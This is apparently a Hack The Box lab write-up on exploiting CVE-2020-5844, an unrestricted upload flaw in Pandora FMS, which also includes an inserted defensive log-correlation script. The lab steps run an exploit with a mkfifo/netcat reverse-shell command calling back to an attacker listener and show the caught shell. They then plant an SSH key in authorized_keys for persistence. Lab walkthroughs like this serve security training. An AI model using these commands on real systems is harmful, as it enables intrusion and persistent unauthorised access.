CVE-2020-5844


A vulnerability was found in Pandora FMS 7.0 NG. It has been declared as critical. Affected by this vulnerability is an unknown function of the file index.php?sec=godmode/extensions&sec2=extensions/files_repo. The manipulation with an unknown input leads to an unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434. The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. As an impact it is known to affect confidentiality, integrity, and availability.

Exploit


An exploit is available online.

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ python3 CVE-2020-5844.py -t 127.0.0.1 8008 -p nh2mou87br8ntaitmofvnur5db -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.2 8888 >/tmp/f'
 
        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
unicord: Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
options: Command Shell Mode
phpsess: nh2mou87br8ntaitmofvnur5db
command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.2 8888 >/tmp/f
website: http://127.0.0.1:8008/pandora_console
exploit: Connected to website! Status Code: 200
exploit: Logged into Pandora FMS!

Launching the exploit. The -p flag supplies the session cookie retrieved from exploiting [[pandora_cve-2021-32099#cve-2021-32099|CVE-2021-32099]].
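From the defender's side, the signal that this CWE-434 issue leaves behind is a POST to the files_repo extension endpoint followed by the same client requesting a server-side script that is not one of the console's entry points. The following added example (not code from the original writeup or from Pandora FMS) correlates those two events over constructed Apache access-log lines; the upload directory and file name in the sample are placeholders, and the KNOWN_ENTRYPOINTS allowlist is an assumption to be extended per deployment.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-log sample (not from the original page); the uploaded
# file name and its directory are placeholders, not Pandora FMS's real storage path.
SAMPLE_LOG = """\
10.10.14.2 - - [20/Apr/2023:12:31:02 +0000] "GET /pandora_console/index.php?sec=godmode/extensions&sec2=extensions/files_repo HTTP/1.1" 200 5123 "-" "python-requests/2.28"
10.10.14.2 - - [20/Apr/2023:12:31:03 +0000] "POST /pandora_console/index.php?sec=godmode/extensions&sec2=extensions/files_repo HTTP/1.1" 200 5311 "-" "python-requests/2.28"
10.10.14.2 - - [20/Apr/2023:12:31:04 +0000] "GET /pandora_console/uploads/placeholder.php HTTP/1.1" 200 0 "-" "python-requests/2.28"
10.10.14.5 - - [20/Apr/2023:12:35:10 +0000] "GET /pandora_console/index.php?sec=godmode/extensions&sec2=extensions/files_repo HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
FILES_REPO = "sec2=extensions/files_repo"          # vulnerable extension endpoint named in the advisory
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5")  # server-executable extensions worth watching
KNOWN_ENTRYPOINTS = {"index.php"}                  # assumption: extend with the console's legitimate scripts

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def find_suspicious(log_text, window=timedelta(minutes=5)):
    """Correlate a POST to the files_repo endpoint with a later request from the same
    client for a server-side script that is not a known entry point. Returns (uploads, alerts)."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    uploads = [r for r in records if r["method"] == "POST" and FILES_REPO in r["path"]]
    alerts = []
    for up in uploads:
        for r in records:
            base = r["path"].split("?", 1)[0].rsplit("/", 1)[-1].lower()
            if (r["ip"] == up["ip"] and up["ts"] < r["ts"] <= up["ts"] + window
                    and base.endswith(SCRIPT_EXT) and base not in KNOWN_ENTRYPOINTS):
                alerts.append({"ip": r["ip"], "upload_at": up["ts"].isoformat(),
                               "path": r["path"], "status": r["status"]})
    return uploads, alerts

if __name__ == "__main__":
    ups, found = find_suspicious(SAMPLE_LOG)
    print(f"{len(ups)} upload POST(s), {len(found)} suspicious follow-up request(s)")
    for a in found:
        print(a)
```

A POST to the endpoint from a legitimate administrator produces no alert on its own; the alert only fires when it is followed by a request for a non-allowlisted script, which is the pattern an uploaded web shell leaves.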

┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.136] 33750
bash: cannot set terminal process group (847): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console/images$ whoami
whoami
matt
matt@pandora:/var/www/pandora/pandora_console/images$ hostname
hostname
pandora
matt@pandora:/var/www/pandora/pandora_console/images$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.136  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:364  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:364  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:64  txqueuelen 1000  (Ethernet)
        RX packets 1168910  bytes 179502193 (179.5 MB)
        RX errors 0  dropped 20  overruns 0  frame 0
        TX packets 1242649  bytes 1011657927 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 35018  bytes 9480153 (9.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 35018  bytes 9480153 (9.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Lateral movement to the matt user is made by exploiting [[#cve-2020-5844|CVE-2020-5844]].

SSH


matt@pandora:/var/www/pandora/pandora_console/images$ mkdir -p ~/.ssh ; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
 
┌──(kali㉿kali)-[~/…/htb/labs/pandora/pandorafms]
└─$ ssh matt@$IP          
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Thu 20 Apr 12:40:54 UTC 2023
 
  System load:           0.0
  Usage of /:            65.5% of 4.87GB
  Memory usage:          19%
  Swap usage:            0%
  Processes:             246
  Users logged in:       1
  IPv4 address for eth0: 10.10.11.136
  IPv6 address for eth0: dead:beef::250:56ff:feb9:364
 
  => /boot is using 91.8% of 219MB
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
matt@pandora:~$ whoami
matt
matt@pandora:~$ hostname
pandora
matt@pandora:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.136  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:364  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:364  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:64  txqueuelen 1000  (Ethernet)
        RX packets 1169668  bytes 179646506 (179.6 MB)
        RX errors 0  dropped 20  overruns 0  frame 0
        TX packets 1243304  bytes 1011761119 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 36802  bytes 9708938 (9.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 36802  bytes 9708938 (9.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0